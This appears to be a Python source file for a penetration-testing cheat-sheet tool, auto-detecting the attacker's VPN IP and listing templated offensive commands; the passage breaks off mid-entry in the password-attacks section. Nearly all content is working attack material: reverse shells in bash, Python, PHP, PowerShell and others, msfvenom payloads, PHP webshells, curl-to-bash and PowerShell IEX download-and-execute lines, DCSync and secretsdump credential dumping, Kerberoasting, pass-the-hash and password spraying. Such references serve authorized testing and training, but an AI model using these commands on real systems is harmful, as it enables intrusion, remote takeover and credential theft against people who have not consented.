from __future__ import annotations

import socket
import subprocess


def detect_lhost() -> str:
    """Try tun0 first (VPN), then common interfaces, then fallback."""
    for iface in ("tun0", "tun1", "tap0", "eth0", "ens33", "ens160", "wlan0"):
        try:
            out = subprocess.check_output(
                ["ip", "-4", "addr", "show", iface],
                stderr=subprocess.DEVNULL, text=True,
            )
            for line in out.splitlines():
                line = line.strip()
                if line.startswith("inet "):
                    return line.split()[1].split("/")[0]
        except Exception:
            continue
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except Exception:
        return "YOUR_IP"


CATEGORIES = [
    "Listeners",
    "Reverse Shells",
    "TTY Upgrade",
    "Payloads",
    "File Transfer",
    "Recon & Nmap",
    "Web Enumeration",
    "SMB & RPC",
    "Active Directory",
    "Password Attacks",
    "Linux PrivEsc",
    "Windows PrivEsc",
    "Tunneling",
    "Web Attacks",
    "DNS",
    "Miscellaneous",
]

SNIPPETS: list[dict] = [

    # ── Listeners ─────────────────────────────────────────────────────────────
    {
        "id": "listen-nc",
        "name": "Netcat Listener",
        "category": "Listeners",
        "command": "nc -nlvp {LPORT}",
        "description": "Basic netcat listener",
        "tags": ["nc", "netcat", "listen"],
    },
    {
        "id": "listen-rlwrap",
        "name": "rlwrap Netcat (better shell)",
        "category": "Listeners",
        "command": "rlwrap nc -nlvp {LPORT}",
        "description": "rlwrap adds readline support — arrow keys & history work",
        "tags": ["nc", "rlwrap", "listen"],
    },
    {
        "id": "listen-socat-tty",
        "name": "Socat TTY Listener",
        "category": "Listeners",
        "command": "socat file:`tty`,raw,echo=0 TCP-LISTEN:{LPORT},reuseaddr",
        "description": "Fully interactive TTY listener via socat",
        "tags": ["socat", "listen", "tty"],
    },
    {
        "id": "listen-pwncat",
        "name": "pwncat-cs Listener",
        "category": "Listeners",
        "command": "pwncat-cs -lp {LPORT}",
        "description": "pwncat — automated post-exploitation framework with built-in privesc",
        "tags": ["pwncat", "listen"],
    },

    # ── Reverse Shells ────────────────────────────────────────────────────────
    {
        "id": "rev-bash",
        "name": "Bash TCP",
        "category": "Reverse Shells",
        "command": "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1",
        "description": "Standard bash reverse shell — most common starting point",
        "tags": ["bash", "reverse", "shell"],
    },
    {
        "id": "rev-bash-196",
        "name": "Bash 196 (fd redirect)",
        "category": "Reverse Shells",
        "command": "0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196",
        "description": "Alternate bash shell using file descriptor 196",
        "tags": ["bash", "reverse", "shell", "fd"],
    },
    {
        "id": "rev-sh-tcp",
        "name": "sh TCP (POSIX)",
        "category": "Reverse Shells",
        "command": "sh -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1",
        "description": "Plain /bin/sh — works when bash isn't available",
        "tags": ["sh", "posix", "reverse", "shell"],
    },
    {
        "id": "rev-python3",
        "name": "Python 3",
        "category": "Reverse Shells",
        "command": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
        "description": "Python 3 reverse shell — reliable across most Linux targets",
        "tags": ["python3", "reverse", "shell"],
    },
    {
        "id": "rev-python2",
        "name": "Python 2",
        "category": "Reverse Shells",
        "command": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
        "description": "Python 2 reverse shell — for older targets",
        "tags": ["python2", "reverse", "shell"],
    },
    {
        "id": "rev-php",
        "name": "PHP",
        "category": "Reverse Shells",
        "command": "php -r '$sock=fsockopen(\"{LHOST}\",{LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
        "description": "PHP one-liner reverse shell",
        "tags": ["php", "reverse", "shell", "web"],
    },
    {
        "id": "rev-perl",
        "name": "Perl",
        "category": "Reverse Shells",
        "command": "perl -e 'use Socket;$i=\"{LHOST}\";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
        "description": "Perl reverse shell",
        "tags": ["perl", "reverse", "shell"],
    },
    {
        "id": "rev-ruby",
        "name": "Ruby",
        "category": "Reverse Shells",
        "command": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"{LHOST}\",\"{LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'",
        "description": "Ruby reverse shell",
        "tags": ["ruby", "reverse", "shell"],
    },
    {
        "id": "rev-nc-mkfifo",
        "name": "Netcat mkfifo",
        "category": "Reverse Shells",
        "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f",
        "description": "nc reverse shell using mkfifo — works on nc versions without -e",
        "tags": ["nc", "netcat", "mkfifo", "reverse", "shell"],
    },
    {
        "id": "rev-nc-e",
        "name": "Netcat -e",
        "category": "Reverse Shells",
        "command": "nc -e /bin/sh {LHOST} {LPORT}",
        "description": "nc with -e flag (traditional nc only, not OpenBSD)",
        "tags": ["nc", "netcat", "reverse", "shell"],
    },
    {
        "id": "rev-socat",
        "name": "Socat",
        "category": "Reverse Shells",
        "command": "socat TCP:{LHOST}:{LPORT} EXEC:\"/bin/sh -i\",pty,stderr,setsid,sigint,sane",
        "description": "Socat reverse shell — gives a proper TTY immediately",
        "tags": ["socat", "reverse", "shell", "tty"],
    },
    {
        "id": "rev-powershell",
        "name": "PowerShell",
        "category": "Reverse Shells",
        "command": "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"$client=New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
        "description": "PowerShell reverse shell — bypasses execution policy",
        "tags": ["powershell", "windows", "reverse", "shell"],
    },
    {
        "id": "rev-nodejs",
        "name": "Node.js",
        "category": "Reverse Shells",
        "command": "node -e \"var net=require('net'),cp=require('child_process'),sh=cp.spawn('/bin/sh',[]);var client=new net.Socket();client.connect({LPORT},'{LHOST}',function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});\"",
        "description": "Node.js reverse shell — useful when Node is available",
        "tags": ["node", "nodejs", "reverse", "shell", "web"],
    },
    {
        "id": "rev-awk",
        "name": "AWK",
        "category": "Reverse Shells",
        "command": "awk 'BEGIN{s=\"/inet/tcp/0/{LHOST}/{LPORT}\";while(1){do{printf \"shell>\" |& s;s |& getline c;if(c){while((c |& getline)>0)print $0 |& s;close(c)}}while(c!=\"exit\")close(s)}}'",
        "description": "AWK reverse shell — useful when only awk is available",
        "tags": ["awk", "reverse", "shell"],
    },
    {
        "id": "rev-lua",
        "name": "Lua",
        "category": "Reverse Shells",
        "command": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');\"",
        "description": "Lua reverse shell",
        "tags": ["lua", "reverse", "shell"],
    },

    # ── TTY Upgrade ───────────────────────────────────────────────────────────
    {
        "id": "tty-python",
        "name": "Python pty spawn",
        "category": "TTY Upgrade",
        "command": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
        "description": "Step 1: spawn a PTY. Then Ctrl+Z → stty raw -echo; fg",
        "tags": ["tty", "pty", "upgrade", "python"],
    },
    {
        "id": "tty-script",
        "name": "script method",
        "category": "TTY Upgrade",
        "command": "script /dev/null -c /bin/bash",
        "description": "Alternative TTY upgrade using script",
        "tags": ["tty", "script", "upgrade"],
    },
    {
        "id": "tty-stty",
        "name": "stty raw (run on attacker after Ctrl+Z)",
        "category": "TTY Upgrade",
        "command": "stty raw -echo; fg",
        "description": "Step 2 of TTY upgrade — run on your machine after Ctrl+Z",
        "tags": ["tty", "stty", "upgrade"],
    },
    {
        "id": "tty-env",
        "name": "Fix terminal env vars",
        "category": "TTY Upgrade",
        "command": "export TERM=xterm; export SHELL=/bin/bash; stty rows 50 columns 220",
        "description": "Step 3 — set TERM and fix terminal size after TTY upgrade",
        "tags": ["tty", "term", "env", "upgrade"],
    },
    {
        "id": "tty-full-chain",
        "name": "Full upgrade chain (all steps)",
        "category": "TTY Upgrade",
        "command": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Ctrl+Z, then on attacker:\n# stty raw -echo; fg\n# Then in shell:\n# export TERM=xterm",
        "description": "Complete TTY upgrade — copy the first line, run stty on attacker after Ctrl+Z",
        "tags": ["tty", "upgrade", "full"],
    },

    # ── Payloads ──────────────────────────────────────────────────────────────
    {
        "id": "msf-linux-elf",
        "name": "msfvenom Linux ELF",
        "category": "Payloads",
        "command": "msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf && chmod +x shell.elf",
        "description": "Stageless Linux 64-bit reverse shell ELF binary",
        "tags": ["msfvenom", "linux", "elf", "payload"],
    },
    {
        "id": "msf-linux-meterpreter",
        "name": "msfvenom Linux Meterpreter",
        "category": "Payloads",
        "command": "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o meter.elf",
        "description": "Linux 64-bit staged Meterpreter",
        "tags": ["msfvenom", "linux", "meterpreter", "payload"],
    },
    {
        "id": "msf-win-exe",
        "name": "msfvenom Windows EXE",
        "category": "Payloads",
        "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe",
        "description": "Windows 64-bit stageless reverse shell EXE",
        "tags": ["msfvenom", "windows", "exe", "payload"],
    },
    {
        "id": "msf-win-meterpreter",
        "name": "msfvenom Windows Meterpreter",
        "category": "Payloads",
        "command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o meter.exe",
        "description": "Windows 64-bit staged Meterpreter EXE",
        "tags": ["msfvenom", "windows", "meterpreter", "payload"],
    },
    {
        "id": "msf-php",
        "name": "msfvenom PHP",
        "category": "Payloads",
        "command": "msfvenom -p php/reverse_php LHOST={LHOST} LPORT={LPORT} -f raw -o shell.php",
        "description": "PHP reverse shell payload",
        "tags": ["msfvenom", "php", "web", "payload"],
    },
    {
        "id": "msf-asp",
        "name": "msfvenom ASP",
        "category": "Payloads",
        "command": "msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f asp -o shell.asp",
        "description": "ASP reverse shell — IIS classic ASP",
        "tags": ["msfvenom", "asp", "iis", "windows", "payload"],
    },
    {
        "id": "msf-aspx",
        "name": "msfvenom ASPX",
        "category": "Payloads",
        "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f aspx -o shell.aspx",
        "description": "ASPX reverse shell — IIS .NET",
        "tags": ["msfvenom", "aspx", "iis", "windows", "payload"],
    },
    {
        "id": "msf-jsp",
        "name": "msfvenom JSP",
        "category": "Payloads",
        "command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f raw -o shell.jsp",
        "description": "JSP reverse shell — Tomcat / Java app servers",
        "tags": ["msfvenom", "jsp", "java", "tomcat", "payload"],
    },
    {
        "id": "msf-war",
        "name": "msfvenom WAR (Tomcat)",
        "category": "Payloads",
        "command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war -o shell.war",
        "description": "WAR file for Tomcat manager upload",
        "tags": ["msfvenom", "war", "java", "tomcat", "payload"],
    },
    {
        "id": "msf-powershell",
        "name": "msfvenom PowerShell",
        "category": "Payloads",
        "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f psh -o shell.ps1",
        "description": "PowerShell reverse shell payload",
        "tags": ["msfvenom", "powershell", "windows", "payload"],
    },
    {
        "id": "php-webshell",
        "name": "PHP webshell (simple)",
        "category": "Payloads",
        "command": "<?php system($_GET['cmd']); ?>",
        "description": "Minimal PHP webshell — access via ?cmd=whoami",
        "tags": ["php", "webshell", "payload"],
    },
    {
        "id": "php-webshell-exec",
        "name": "PHP webshell (exec)",
        "category": "Payloads",
        "command": "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>",
        "description": "PHP shell_exec webshell with stderr",
        "tags": ["php", "webshell", "payload"],
    },

    # ── File Transfer ─────────────────────────────────────────────────────────
    {
        "id": "ft-py-server",
        "name": "Python HTTP server",
        "category": "File Transfer",
        "command": "python3 -m http.server 8080",
        "description": "Serve current directory over HTTP on port 8080",
        "tags": ["python", "http", "server", "transfer"],
    },
    {
        "id": "ft-wget",
        "name": "wget download",
        "category": "File Transfer",
        "command": "wget http://{LHOST}:8080/FILE -O /tmp/FILE",
        "description": "Download a file from your Python HTTP server",
        "tags": ["wget", "download", "transfer"],
    },
    {
        "id": "ft-curl",
        "name": "curl download",
        "category": "File Transfer",
        "command": "curl http://{LHOST}:8080/FILE -o /tmp/FILE",
        "description": "curl download from your Python HTTP server",
        "tags": ["curl", "download", "transfer"],
    },
    {
        "id": "ft-curl-exec",
        "name": "curl pipe to bash",
        "category": "File Transfer",
        "command": "curl http://{LHOST}:8080/shell.sh | bash",
        "description": "Download and execute in one line",
        "tags": ["curl", "exec", "transfer"],
    },
    {
        "id": "ft-impacket-smb",
        "name": "impacket SMB server",
        "category": "File Transfer",
        "command": "impacket-smbserver share . -smb2support",
        "description": "Share current directory over SMB — access from Windows with \\\\{LHOST}\\share",
        "tags": ["impacket", "smb", "server", "transfer", "windows"],
    },
    {
        "id": "ft-smb-copy",
        "name": "SMB copy (Windows target)",
        "category": "File Transfer",
        "command": "copy \\\\{LHOST}\\share\\file.exe C:\\Temp\\file.exe",
        "description": "Copy from SMB share to Windows target",
        "tags": ["smb", "copy", "windows", "transfer"],
    },
    {
        "id": "ft-certutil",
        "name": "certutil download (Windows)",
        "category": "File Transfer",
        "command": "certutil.exe -urlcache -split -f http://{LHOST}:8080/file.exe file.exe",
        "description": "Windows LOLBin download via certutil",
        "tags": ["certutil", "windows", "lolbin", "download", "transfer"],
    },
    {
        "id": "ft-powershell-iwr",
        "name": "PowerShell Invoke-WebRequest",
        "category": "File Transfer",
        "command": "Invoke-WebRequest -Uri http://{LHOST}:8080/file.exe -OutFile C:\\Temp\\file.exe",
        "description": "PowerShell download",
        "tags": ["powershell", "iwr", "windows", "download", "transfer"],
    },
    {
        "id": "ft-powershell-iex",
        "name": "PowerShell IEX download & execute",
        "category": "File Transfer",
        "command": "IEX(New-Object Net.WebClient).downloadString('http://{LHOST}:8080/shell.ps1')",
        "description": "Download and execute PowerShell script in memory",
        "tags": ["powershell", "iex", "windows", "exec", "transfer"],
    },
    {
        "id": "ft-b64-encode",
        "name": "base64 encode file",
        "category": "File Transfer",
        "command": "base64 -w 0 file.exe | xclip -selection clipboard",
        "description": "Encode file to base64, copy to clipboard for pasting",
        "tags": ["base64", "encode", "transfer"],
    },
    {
        "id": "ft-b64-decode",
        "name": "base64 decode file",
        "category": "File Transfer",
        "command": "echo 'BASE64STRING' | base64 -d > file.exe",
        "description": "Decode base64 back to binary",
        "tags": ["base64", "decode", "transfer"],
    },
    {
        "id": "ft-scp-upload",
        "name": "SCP upload to target",
        "category": "File Transfer",
        "command": "scp file.sh user@{RHOST}:/tmp/file.sh",
        "description": "Upload file to target via SCP",
        "tags": ["scp", "upload", "ssh", "transfer"],
    },
    {
        "id": "ft-scp-download",
        "name": "SCP download from target",
        "category": "File Transfer",
        "command": "scp user@{RHOST}:/etc/passwd ./passwd",
        "description": "Download file from target via SCP",
        "tags": ["scp", "download", "ssh", "transfer"],
    },

    # ── Recon & Nmap ──────────────────────────────────────────────────────────
    {
        "id": "nmap-quick",
        "name": "Nmap quick scan",
        "category": "Recon & Nmap",
        "command": "nmap -sV --open {RHOST}",
        "description": "Fast scan of top 1000 ports with version detection",
        "tags": ["nmap", "scan", "quick"],
    },
    {
        "id": "nmap-full-tcp",
        "name": "Nmap full TCP",
        "category": "Recon & Nmap",
        "command": "nmap -p- --min-rate 5000 -sV -sC {RHOST} -oX {TARGET}-full.xml",
        "description": "All 65535 TCP ports, version + default scripts, save XML for trace import",
        "tags": ["nmap", "scan", "full", "tcp", "xml"],
    },
    {
        "id": "nmap-aggressive",
        "name": "Nmap aggressive",
        "category": "Recon & Nmap",
        "command": "nmap -A -T4 {RHOST}",
        "description": "OS detection, version, scripts, and traceroute",
        "tags": ["nmap", "aggressive", "os"],
    },
    {
        "id": "nmap-udp",
        "name": "Nmap UDP top 100",
        "category": "Recon & Nmap",
        "command": "nmap -sU --top-ports 100 {RHOST}",
        "description": "Top 100 UDP ports — slow but catches DNS/SNMP/NFS",
        "tags": ["nmap", "udp", "scan"],
    },
    {
        "id": "nmap-vuln",
        "name": "Nmap vuln scripts",
        "category": "Recon & Nmap",
        "command": "nmap --script vuln -sV {RHOST}",
        "description": "Run NSE vulnerability detection scripts",
        "tags": ["nmap", "vuln", "scripts", "nse"],
    },
    {
        "id": "nmap-smb-scripts",
        "name": "Nmap SMB scripts",
        "category": "Recon & Nmap",
        "command": "nmap --script \"smb-*\" -p 445 {RHOST}",
        "description": "All SMB NSE scripts against target",
        "tags": ["nmap", "smb", "scripts"],
    },
    {
        "id": "nmap-ping-sweep",
        "name": "Nmap ping sweep",
        "category": "Recon & Nmap",
        "command": "nmap -sn 10.10.10.0/24",
        "description": "Discover live hosts in a /24 subnet",
        "tags": ["nmap", "ping", "sweep", "discover"],
    },
    {
        "id": "nmap-greppable",
        "name": "Nmap save all formats",
        "category": "Recon & Nmap",
        "command": "nmap -sV -sC -p- {RHOST} -oA {TARGET}-scan",
        "description": "Save normal, XML, and grepable output",
        "tags": ["nmap", "save", "output"],
    },

    # ── Web Enumeration ───────────────────────────────────────────────────────
    {
        "id": "web-gobuster-dir",
        "name": "Gobuster directory",
        "category": "Web Enumeration",
        "command": "gobuster dir -u http://{RHOST} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak -o gobuster-{TARGET}.txt",
        "description": "Directory and file brute force with common extensions",
        "tags": ["gobuster", "dir", "web", "enum"],
    },
    {
        "id": "web-gobuster-vhost",
        "name": "Gobuster vhost",
        "category": "Web Enumeration",
        "command": "gobuster vhost -u http://{RHOST} -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 50",
        "description": "Virtual host discovery — finds subdomains",
        "tags": ["gobuster", "vhost", "subdomain", "web"],
    },
    {
        "id": "web-gobuster-dns",
        "name": "Gobuster DNS",
        "category": "Web Enumeration",
        "command": "gobuster dns -d {TARGET} -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50",
        "description": "DNS subdomain brute force",
        "tags": ["gobuster", "dns", "subdomain"],
    },
    {
        "id": "web-ffuf-dir",
        "name": "ffuf directory",
        "category": "Web Enumeration",
        "command": "ffuf -u http://{RHOST}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302,403 -t 100",
        "description": "Fast directory fuzzing with ffuf",
        "tags": ["ffuf", "dir", "web", "enum", "fuzz"],
    },
    {
        "id": "web-ffuf-ext",
        "name": "ffuf with extensions",
        "category": "Web Enumeration",
        "command": "ffuf -u http://{RHOST}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php,.txt,.html,.bak,.old -mc 200,301,302 -t 100",
        "description": "ffuf directory + extension fuzzing combined",
        "tags": ["ffuf", "dir", "ext", "web", "fuzz"],
    },
    {
        "id": "web-ffuf-vhost",
        "name": "ffuf vhost",
        "category": "Web Enumeration",
        "command": "ffuf -u http://{RHOST} -H \"Host: FUZZ.{TARGET}\" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 302 -t 100",
        "description": "Virtual host enumeration via Host header fuzzing",
        "tags": ["ffuf", "vhost", "subdomain", "web"],
    },
    {
        "id": "web-ffuf-param",
        "name": "ffuf parameter fuzz",
        "category": "Web Enumeration",
        "command": "ffuf -u http://{RHOST}/page.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200 -t 50",
        "description": "Discover hidden GET parameters",
        "tags": ["ffuf", "param", "web", "fuzz"],
    },
    {
        "id": "web-feroxbuster",
        "name": "Feroxbuster recursive",
        "category": "Web Enumeration",
        "command": "feroxbuster -u http://{RHOST} -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 100 -d 3 -x php,html,txt",
        "description": "Recursive directory brute force — finds nested directories automatically",
        "tags": ["feroxbuster", "recursive", "web", "enum"],
    },
    {
        "id": "web-nikto",
        "name": "Nikto scan",
        "category": "Web Enumeration",
        "command": "nikto -h http://{RHOST} -o nikto-{TARGET}.txt",
        "description": "Web server vulnerability scanner",
        "tags": ["nikto", "vuln", "web", "scan"],
    },
    {
        "id": "web-whatweb",
        "name": "WhatWeb",
        "category": "Web Enumeration",
        "command": "whatweb -a 3 http://{RHOST}",
        "description": "Identify web technologies, frameworks, CMS",
        "tags": ["whatweb", "fingerprint", "web", "tech"],
    },
    {
        "id": "web-wpscan",
        "name": "WPScan enumerate",
        "category": "Web Enumeration",
        "command": "wpscan --url http://{RHOST} --enumerate u,vp,ap --plugins-detection aggressive",
        "description": "WordPress: enumerate users, vulnerable plugins, all plugins",
        "tags": ["wpscan", "wordpress", "wp", "web"],
    },
    {
        "id": "web-curl-headers",
        "name": "curl check headers",
        "category": "Web Enumeration",
        "command": "curl -I http://{RHOST} && curl -I https://{RHOST}",
        "description": "Show HTTP response headers — reveals server, frameworks, cookies",
        "tags": ["curl", "headers", "web", "fingerprint"],
    },
    {
        "id": "web-robots",
        "name": "robots.txt + sitemap",
        "category": "Web Enumeration",
        "command": "curl -s http://{RHOST}/robots.txt; curl -s http://{RHOST}/sitemap.xml",
        "description": "Check robots.txt and sitemap for hidden paths",
        "tags": ["robots", "sitemap", "web"],
    },

    # ── SMB & RPC ─────────────────────────────────────────────────────────────
    {
        "id": "smb-list-null",
        "name": "smbclient list shares (null auth)",
        "category": "SMB & RPC",
        "command": "smbclient -L //{RHOST} -N",
        "description": "List SMB shares with null/anonymous auth",
        "tags": ["smb", "smbclient", "null", "enum"],
    },
    {
        "id": "smb-connect",
        "name": "smbclient connect to share",
        "category": "SMB & RPC",
        "command": "smbclient //{RHOST}/SHARE -U 'username%password'",
        "description": "Connect to a specific SMB share",
        "tags": ["smb", "smbclient", "connect"],
    },
    {
        "id": "smb-smbmap",
        "name": "smbmap enumerate",
        "category": "SMB & RPC",
        "command": "smbmap -H {RHOST} -u 'username' -p 'password'",
        "description": "List shares and permissions",
        "tags": ["smbmap", "smb", "enum"],
    },
    {
        "id": "smb-enum4linux",
        "name": "enum4linux-ng full",
        "category": "SMB & RPC",
        "command": "enum4linux-ng -A {RHOST}",
        "description": "Full SMB/RPC enumeration — users, groups, shares, policies",
        "tags": ["enum4linux", "smb", "rpc", "enum"],
    },
    {
        "id": "smb-netexec-recon",
        "name": "NetExec SMB recon",
        "category": "SMB & RPC",
        "command": "netexec smb {RHOST}",
        "description": "Quick SMB recon — shows OS, signing, hostname (no creds needed)",
        "tags": ["netexec", "nxc", "smb", "recon"],
    },
    {
        "id": "smb-netexec-shares",
        "name": "NetExec enumerate shares",
        "category": "SMB & RPC",
        "command": "netexec smb {RHOST} -u 'username' -p 'password' --shares",
        "description": "List SMB shares and access level with NetExec",
        "tags": ["netexec", "nxc", "smb", "shares"],
    },
    {
        "id": "smb-netexec-users",
        "name": "NetExec enumerate users",
        "category": "SMB & RPC",
        "command": "netexec smb {RHOST} -u 'username' -p 'password' --users",
        "description": "Enumerate domain users via SMB",
        "tags": ["netexec", "nxc", "smb", "users"],
    },
    {
        "id": "smb-netexec-spray",
        "name": "NetExec password spray",
        "category": "SMB & RPC",
        "command": "netexec smb {RHOST} -u users.txt -p 'Password123!' --continue-on-success",
        "description": "Spray one password against a user list",
        "tags": ["netexec", "nxc", "smb", "spray", "password"],
    },
    {
        "id": "smb-netexec-pth",
        "name": "NetExec pass-the-hash",
        "category": "SMB & RPC",
        "command": "netexec smb {RHOST} -u 'Administrator' -H 'NTHASH' --local-auth",
        "description": "Authenticate using NTLM hash instead of password",
        "tags": ["netexec", "nxc", "smb", "pth", "hash"],
    },
    {
        "id": "smb-rpcclient",
        "name": "rpcclient null session",
        "category": "SMB & RPC",
        "command": "rpcclient -U '' -N {RHOST}",
        "description": "RPC null session — try enumdomusers, enumdomgroups inside",
        "tags": ["rpcclient", "rpc", "null", "smb"],
    },
    {
        "id": "smb-impacket-server",
        "name": "impacket SMB server",
        "category": "SMB & RPC",
        "command": "impacket-smbserver share . -smb2support",
        "description": "Host current dir as SMB share — great for file drops and NTLM capture",
        "tags": ["impacket", "smb", "server", "share"],
    },

    # ── Active Directory ──────────────────────────────────────────────────────
    {
        "id": "ad-ldap-anon",
        "name": "ldapsearch anonymous",
        "category": "Active Directory",
        "command": "ldapsearch -x -H ldap://{RHOST} -b '' -s base namingContexts",
        "description": "Enumerate base naming contexts anonymously",
        "tags": ["ldap", "ldapsearch", "ad", "enum"],
    },
    {
        "id": "ad-ldap-users",
        "name": "ldapsearch dump users",
        "category": "Active Directory",
        "command": "ldapsearch -x -H ldap://{RHOST} -D 'DOMAIN\\username' -w 'password' -b 'DC=DOMAIN,DC=LOCAL' '(objectClass=user)' sAMAccountName | grep sAMAccountName",
        "description": "Dump all user sAMAccountNames from LDAP",
        "tags": ["ldap", "ldapsearch", "users", "ad"],
    },
    {
        "id": "ad-bloodhound",
        "name": "BloodHound collection",
        "category": "Active Directory",
        "command": "bloodhound-python -u 'username' -p 'password' -ns {RHOST} -d DOMAIN.LOCAL -c All --zip",
        "description": "Collect all BloodHound data — import zip into BloodHound UI",
        "tags": ["bloodhound", "ad", "collection", "graph"],
    },
    {
        "id": "ad-kerbrute",
        "name": "kerbrute user enum",
        "category": "Active Directory",
        "command": "kerbrute userenum -d DOMAIN.LOCAL --dc {RHOST} /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt",
        "description": "Fast Kerberos user enumeration — no auth needed, leaves minimal logs",
        "tags": ["kerbrute", "kerberos", "users", "ad"],
    },
    {
        "id": "ad-asrep",
        "name": "AS-REP Roasting",
        "category": "Active Directory",
        "command": "impacket-GetNPUsers DOMAIN.LOCAL/ -usersfile users.txt -no-pass -dc-ip {RHOST} -outputfile asrep-hashes.txt",
        "description": "Get AS-REP hashes for users with Kerberos pre-auth disabled — crack with hashcat -m 18200",
        "tags": ["asrep", "kerberos", "roast", "impacket", "ad"],
    },
    {
        "id": "ad-kerberoast",
        "name": "Kerberoasting",
        "category": "Active Directory",
        "command": "impacket-GetUserSPNs DOMAIN.LOCAL/username:password -dc-ip {RHOST} -request -outputfile kerberoast-hashes.txt",
        "description": "Get TGS tickets for service accounts — crack with hashcat -m 13100",
        "tags": ["kerberoast", "kerberos", "spn", "impacket", "ad"],
    },
    {
        "id": "ad-secretsdump",
        "name": "secretsdump (remote)",
        "category": "Active Directory",
        "command": "impacket-secretsdump DOMAIN/username:password@{RHOST}",
        "description": "Dump NTLM hashes, LSA secrets, and cached credentials remotely",
        "tags": ["secretsdump", "impacket", "hash", "dump", "ad"],
    },
    {
        "id": "ad-secretsdump-dc",
        "name": "secretsdump DC only",
        "category": "Active Directory",
        "command": "impacket-secretsdump -just-dc DOMAIN/username:password@{RHOST}",
        "description": "Dump only domain controller hashes (DCSync)",
        "tags": ["secretsdump", "dcsync", "impacket", "ad"],
    },
    {
        "id": "ad-evil-winrm",
        "name": "evil-winrm password",
        "category": "Active Directory",
        "command": "evil-winrm -i {RHOST} -u username -p 'password'",
        "description": "WinRM shell with password",
        "tags": ["evil-winrm", "winrm", "shell", "windows", "ad"],
    },
    {
        "id": "ad-evil-winrm-hash",
        "name": "evil-winrm pass-the-hash",
        "category": "Active Directory",
        "command": "evil-winrm -i {RHOST} -u username -H 'NTHASH'",
        "description": "WinRM shell using NTLM hash",
        "tags": ["evil-winrm", "winrm", "pth", "hash", "windows", "ad"],
    },
    {
        "id": "ad-psexec",
        "name": "impacket psexec",
        "category": "Active Directory",
        "command": "impacket-psexec DOMAIN/username:password@{RHOST}",
        "description": "Remote SYSTEM shell via psexec technique",
        "tags": ["psexec", "impacket", "shell", "windows", "ad"],
    },
    {
        "id": "ad-wmiexec",
        "name": "impacket wmiexec",
        "category": "Active Directory",
        "command": "impacket-wmiexec DOMAIN/username:password@{RHOST}",
        "description": "Semi-interactive shell via WMI — quieter than psexec",
        "tags": ["wmiexec", "wmi", "impacket", "shell", "windows", "ad"],
    },

    # ── Password Attacks ──────────────────────────────────────────────────────
    {
        "id": "pass-hydra-ssh",
        "name": "Hydra SSH",
        "category": "Password Attacks",
        "command": "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://{RHOST} -t 4",
        "description": "SSH brute force (low thread count to avoid lockout)",
